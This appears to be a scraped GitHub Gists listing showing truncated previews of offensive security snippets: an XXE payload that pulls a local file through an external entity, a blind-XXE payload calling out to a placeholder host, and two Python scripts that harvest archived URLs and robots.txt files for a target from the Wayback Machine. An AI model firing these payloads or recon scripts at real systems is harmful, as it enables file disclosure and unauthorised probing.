natashacarmine

jobertabma / attack.xml

Created June 13, 2017 17:39 — forked from janmartenjongerius/attack.xml

XXE attack using PHP

	<!DOCTYPE scan [
	<!ENTITY test SYSTEM "target.xml">
	]><scan>&test;</scan>

mhmdiaa / waybackurls.py

Last active February 23, 2025 03:46

	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

mhmdiaa / waybackrobots.py

Last active February 8, 2025 06:36

	import requests
	import re
	import sys
	from multiprocessing.dummy import Pool


	def robots(host):
	r = requests.get(
	'https://web.archive.org/cdx/search/cdx\
	?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

staaldraad / XXE_payloads

Last active October 8, 2024 15:20

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>